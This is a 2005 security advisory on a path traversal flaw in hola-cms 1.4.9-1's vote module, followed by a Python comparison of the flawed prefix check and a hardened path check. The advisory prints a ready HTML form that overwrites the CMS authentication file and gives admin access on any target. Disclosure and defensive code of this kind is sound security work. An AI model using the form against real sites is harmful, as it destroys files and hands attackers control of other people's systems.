- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-002
- - - --------------------------------------------------------------------
DATE              : 2005-03-13 15:11 GMT
TYPE              : remote
VERSIONS AFFECTED : hola-cms-1.4.9-1 (http://holacms.drunkencat.net/)
AUTHOR            : Virginity
ADVISORY NUMBER   : 004
- - - --------------------------------------------------------------------
Description:

Like the one in SA-2005-001: a new patched version, 1.4.9-1, was released in which that issue was marked as solved. The vote module (vote_save_results.php) now checks with strpos() whether the submitted "vote_filename" variable contains "holaDB/votes" at position 0.

BUT! Since we all know how to change directories by typing ../, we can still manipulate or destroy every file on the whole server by simply sending "vote_filename=holaDB/votes/../../[anything we want]"!!!

Below is the updated example of how to destroy the login-authentication file and gain access to the admin functions. Really sad that the quick patch (released 3? hours after notification) doesn't really work. The author of the software has been notified.

- - - --------------------------------------------------------------------
Example:

Create this HTML form (that makes it easier to use on multiple targets):

    <form action="http://[target]/[site-with-vote].php?vote=1" method="POST">
      <input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php">
      <input type="hidden" name="result" value="0">
      <input type="submit" value="Stimme abgeben" name="button">
    </form>

Of course you'll have to edit [target] and [site-with-vote] to match your site! Now when you push the button, the first lines of multiuser.php (which includes the authentication mechanism) get overwritten, and by calling http://[target]/admin/index_cms.php you have access to all user functions; by calling http://[target]/admin/[module you want].php?username=siteadmin, to all siteadmin functions!
- - - --------------------------------------------------------------------
Solution:

Use another CMS... I think PHP-Nuke isn't that vulnerable ;)

- - - --------------------------------------------------------------------
Personal note:

YES! The girl did it again :) Contact me on IRC!

- - - --------------------------------------------------------------------
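The prefix test the advisory describes, next to a canonicalising check that stays closed against the ../ bypass. This is an added illustration written for this page, not code from hola-cms; the install path and file names are assumptions.

```python
import posixpath

# Constructed layout for the example: a hypothetical web root and the
# votes directory the module is meant to write into.
WEB_ROOT = "/var/www/holacms"
VOTES_DIR = "holaDB/votes"


def weak_check(vote_filename: str) -> bool:
    """Mirror of the 1.4.9-1 fix: strpos(...) == 0, a bare prefix test.

    It only asks whether the string *starts* with the votes directory, so
    'holaDB/votes/../../anything' passes even though it leaves the directory.
    """
    return vote_filename.find(VOTES_DIR) == 0


def hardened_check(vote_filename: str) -> bool:
    """Normalise the path and require it to resolve inside VOTES_DIR.

    posixpath.normpath collapses '.' and '..' segments, so a traversing value
    resolves to its real destination and is then rejected by the descendant
    test. A NUL byte or an absolute path is refused outright. On a live
    system, run os.path.realpath() on the result as well so symlinks cannot
    point back outside the base directory.
    """
    if "\0" in vote_filename or posixpath.isabs(vote_filename):
        return False
    base = posixpath.normpath(posixpath.join(WEB_ROOT, VOTES_DIR))
    target = posixpath.normpath(posixpath.join(WEB_ROOT, vote_filename))
    # Strict descendant: the target must lie below base, not be base itself.
    return target.startswith(base + "/")


def audit(vote_filename: str) -> dict:
    """Return both verdicts so the gap between them is visible in one call."""
    return {"weak": weak_check(vote_filename),
            "hardened": hardened_check(vote_filename)}
```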